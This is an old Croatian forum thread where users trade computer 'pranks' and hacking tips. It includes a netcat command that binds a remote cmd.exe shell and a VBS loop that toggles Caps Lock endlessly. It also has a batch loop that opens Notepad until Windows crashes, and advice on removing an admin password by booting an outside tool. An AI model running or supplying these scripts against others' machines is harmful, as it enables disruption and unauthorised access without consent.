Vaši prankovi (šale) i hackovi

poruka: 1.070
|
čitano: 259.294
|
moderatori: DrNasty, pirat, Lazarus Long, XXX-Man, vincimus
+/- sve poruke
ravni prikaz
starije poruke gore
14 godina
neaktivan
RE: Vaši prankovi (šale) i hackovi
ali vecina nezna
imas na youtubu i kako hackat server ali 99% usera formua nezna, skupa samnom
Aint no man above the crew
14 godina
protjeran

vjerojatno se i to moze naci nisam trazio ali sve vezano uz ovu temu na youtubeu su sve zastarjeli klipovi

14 godina
neaktivan
ti idalje mozes koristiti tte "trikove" (nisu bas hackovi) kolio god su oni stari
pa netBIOS postoji vec...
14 godina
protjeran

aj stavi onda par linkova da netrazim^^

14 godina
neaktivan
a ljenosti upisati sve sto trebas u youtube :\
upisi samo cmd chat, netBIOS hacking i to su ti ta 2
onda remote desktop hacking...
google is your friend
14 godina
protjeran
1337Code_breaker kaže...
a ljenosti upisati sve sto trebas u youtube :\
upisi samo cmd chat, netBIOS hacking i to su ti ta 2
onda remote desktop hacking...
google is your friend

lol ja tebi to kazem onda ti meni vracas istom mjerom^^

nes ti remote dektop hacking,cmd chat u pm to sam vidio prije 12 godina na netu a i tada je to bilo staro^^

14 godina
neaktivan
evo jedan za cmd chat
za net bios je pun google, nađi nes
14 godina
RE: Vaši prankovi(šale) i hackovi
Unknown1909 kaže...
B-52 kaže...
mtopol kaže...

gluposti

sta su ovo neke 3d slike..ne kuzim kak to funkcionira al dobro izgleda ;)
 To su ti optičke varke ;)
Stavio sam bratu onu skriptu! 1. sam stavio da kad on oce pokrenuti GTA4, da mu se otvori ta skripta s textom : You are to stupid to play this game! If you play it too long your brother will kill you. Do you want to continue?
Ovaj je pokrenuo i ostao zapanjen. Još uvijek sjedi za kompom sirom otvorenih usta :) Hvala na ovome, vrijedilo je! Cool

možeš mi reći kako si to napravio

16 godina
neaktivan

Ok, sve mi je jasno, ali kako si izvršio taj batch ili slično. Ja kužim, da je on imao file&printer sharing upaljen, te su mu 137,138 i 139 otvoreni, samo mi nije jasno kako si spawnao cmd da pokreneš određeni batch.

Po meni, ti izmišljaš taj dio u kojem si pokrenuo nešto na tom računalu i tako mu otvarao CD/DVD pogon. Jer si mogao nešto iskopirati, ali ne i pokrenuti to na tom računalu.

Nemoj sad mi pričati da tražim po yt ili guglu.

Imamo televune, radivone, televizije, lektrika, lektrika, sva čuda, raj na zemlji brajo... Samo nemamo pisme, ni ognjišta ni smija... E!
14 godina
protjeran

eto ako on na to odgovori ja mu saljem 20$ na paypal isti sekund

15 godina
protjeran
Smooth Operator kaže...

Ok, sve mi je jasno, ali kako si izvršio taj batch ili slično. Ja kužim, da je on imao file&printer sharing upaljen, te su mu 137,138 i 139 otvoreni, samo mi nije jasno kako si spawnao cmd da pokreneš određeni batch.

Po meni, ti izmišljaš taj dio u kojem si pokrenuo nešto na tom računalu i tako mu otvarao CD/DVD pogon. Jer si mogao nešto iskopirati, ali ne i pokrenuti to na tom računalu.

Nemoj sad mi pričati da tražim po yt ili guglu.

Pa to su prastare fore sa netcat-om. To se još radilo prije 2000.

nc -v -e cmd.exe -p 139 xxx.xxx.xxx

Prepolovit ću pučanstvo jer ne volim kretene
14 godina
neaktivan
Bellatrix kaže...

Evo još dvije zanimljive skripte od mene:

Set wshShell =wscript.CreateObject("WScript.Shell")
do
wscript.sleep 100
wshshell.sendkeys "{CAPSLOCK}"
loop

spremite kao .vbs ovo stalno pali gasi Caps Lock tako da žrtva nemože normalno pisati.. heheheSmijeh

a ovu skriptu:

@ECHO off
:top
START %SystemRoot%\system32\notepad.exe
GOTO top

spremite kao .bat konstantno otvara notepad i zaledi komp dok se ne sruše windowsi. Možete staviti nekome ako ste ljuti na njega!Viče heheSmijeh

Of course sve radite na svoju vlastitu odgovornost.

kako da sad zgASIM tAj CApS loCK XD

14 godina

evo ja sam novi u ovoj temi i sad želim svojoj sestri podvalit šalu sve sam napravi ali neznam kako da se pokreće u igri

14 godina
neaktivan

Pozdrav svima!

Ne razumem se mnogo oko hakovanja.Interesanto je sve sto pisete.AKo postoji neki tutor,gde mogu da ucim o hakovanju,bio bih vam zahvalan.Naravno,zeleo bih da sve to znam,ali sad je to sve daleko....

Hvala!

Slobodan.

Poruka je uređivana zadnji put uto 23.11.2010 21:39 (Sloba).
14 godina
Sloba kaže...

Pozdrav svima!

Ne razumem se mnogo oko hakovanja.Interesanto je sve sto pisete.AKo postoji neki tutor,gde mogu da ucim o hakovanju,bio bih vam zahvalan.Naravno,zeleo bih da sve to znam,ali sad je to sve daleko....

Hvala!

Slobodan.

i ja isto ali je ova tema pusta cijeli dan čekam odgovor

14 godina
neaktivan

Ljudi imaju privatan zivot,pa je i normalno da ponekad cekas duze vreme:)

15 godina
neaktivan

Puno je veci problem u tome sto vecina ljudi ovu temu smatraju humorom...

I have got no money, I have got no power, I have got no fame... I have my strong beliefs...
14 godina
Deus ex machina kaže...

i ja isto to mislim ali neki prankovi nisu baš za šalu npr.otvori ti notepad.exe i zaledi ti sekomp i padnu winsi

16 godina
neaktivan
joj otvori ti notepad xxx puta stas sad. Ako je u startupu digni safe mode i obrisi ga. Velike pameti,mos doktorirat na tome.
Nick Praskaton
14 godina
Deus ex machina kaže...

Kao ja sada..

Kraj razgovora s Kobeom kaže novinar: "Mozda ipak nije kao drazen petrovic ali ipak igra kao super zvijezda"
16 godina
neaktivan
lzgr kaže...
joj otvori ti notepad xxx puta stas sad. Ako je u startupu digni safe mode i obrisi ga. Velike pameti,mos doktorirat na tome.

o bože, pa to je prank(šala) da bi se nasmijao drugome koji neznaju.. šta misliš da svi znaju kak se to može makniti, kak se ode u safe mode itd?? većina mojih frendova pojma nema ni šta je to safe mode, a kamoli kako do tamo doći... 

I See Offline People ! Mladim djevojkama podešavam CONFIG SYSe i pravim AUTOEXEC BATe ... :D
15 godina

Evo ja sam noob što se ovoga tiče pa se ne ljutite ako neka debilna pitanja postavim{#} Uglavnom možda je već odgovoreno ali baš da sada svih 20-ak stranica pretražim mi je previše...

Uglavnom vidio sam malo po temi te prankove sa tim notepadom da iskaču textboxovi, otvara se ladica od čitača i slično, pa mi je došla ideja da i ja nešto jednom frendu tako podmetnem{#}

Uglavnom, zanima me da li se na te prankove može staviti kakav tajmer kada će se on pokrenuti, tipa ja to njemu uvalim danas na komp, a njemu se to za nekoliko dana/tjedana pokrene u određeno vrijeme? Tako da ne bi mogao posumnjati da sam ja imao prste u tome{#}

Stoja
16 godina
neaktivan
system kaže...
lzgr kaže...

o bože, pa to je prank(šala) da bi se nasmijao drugome koji neznaju.. šta misliš da svi znaju kak se to može makniti, kak se ode u safe mode itd?? većina mojih frendova pojma nema ni šta je to safe mode, a kamoli kako do tamo doći... 

Zovu tebe i ti im to naplatiš. {#}

Nick Praskaton
14 godina
neaktivan
lzgr kaže...
system kaže...
lzgr kaže...

Zovu tebe i ti im to naplatiš. {#}

a sad frendovima naplacivat....ja nekima i dajem starije komade hardware-a i to,al naplatit naivnim budalama koje prvi put vidim u zivotu il ih poznajem iz viđenja mi nikad nije bio problem... :)

14 godina
neaktivan
Da li mi neko moze reci kako se moze,a verujem da moze,provaliti na kompjuter ako se i administratoru stavi pass.Ovo pitam zato sto sam prvo stavio pass na komp,ali mi klinac preko safe mode usao preko admina i sve palo u vodu.Naravno,sad sam i adminu stavio pass i tu ˝obezbedio˝ komp od klinca.Ako postoji neki drugi nacin kako da upadne,nadam se da cu ovde dobiti info.
Pozz!
15 godina
Sloba kaže...
Da li mi neko moze reci kako se moze,a verujem da moze,provaliti na kompjuter ako se i administratoru stavi pass.Ovo pitam zato sto sam prvo stavio pass na komp,ali mi klinac preko safe mode usao preko admina i sve palo u vodu.Naravno,sad sam i adminu stavio pass i tu ˝obezbedio˝ komp od klinca.Ako postoji neki drugi nacin kako da upadne,nadam se da cu ovde dobiti info.
Pozz!

Postoji. Nije nešto težak..samo treba bootat program (ili u slučaju da želiš baš saznat password, distribuciju linux-a) prije dizanja windows-a, a ostalo softver sve napravi za tebe (otkrije/makne šifru).

www.damagehigh.co.cc // Don't fix what ain't broken!
16 godina
neaktivan
Sloba kaže...
Pozz!

Koji OS?

Nije se teško zaljubiti, nego je to teško reći. Nitko nije obavezan da drugog voli više nego sebe sama.
14 godina
neaktivan
Stoja kaže...

Evo ja sam noob što se ovoga tiče pa se ne ljutite ako neka debilna pitanja postavim{#} Uglavnom možda je već odgovoreno ali baš da sada svih 20-ak stranica pretražim mi je previše...

Uglavnom vidio sam malo po temi te prankove sa tim notepadom da iskaču textboxovi, otvara se ladica od čitača i slično, pa mi je došla ideja da i ja nešto jednom frendu tako podmetnem{#}

Uglavnom, zanima me da li se na te prankove može staviti kakav tajmer kada će se on pokrenuti, tipa ja to njemu uvalim danas na komp, a njemu se to za nekoliko dana/tjedana pokrene u određeno vrijeme? Tako da ne bi mogao posumnjati da sam ja imao prste u tome{#}

tesko ili nikako, posto bi se prces ugasio nakos shutdowna

virus/crv bi morao uci u win32 datoteke... i tamo se prikocpati za startup...

15 godina

Da to sam i mislio da bi se morao nekako nakaćiti na startup...da li je moguće recimo manualno staviti dok sam ja na tom kompu da određeni app stavim na autostart preko onog msconfiga ili sličnih alata? Bi tako nešto moglo upaliti?

Stoja
14 godina
neaktivan
Sloba kaže...
Pozz!
Koji OS?

XP SP2 :)
Nova poruka
E-mail:
Lozinka:

vrh stranice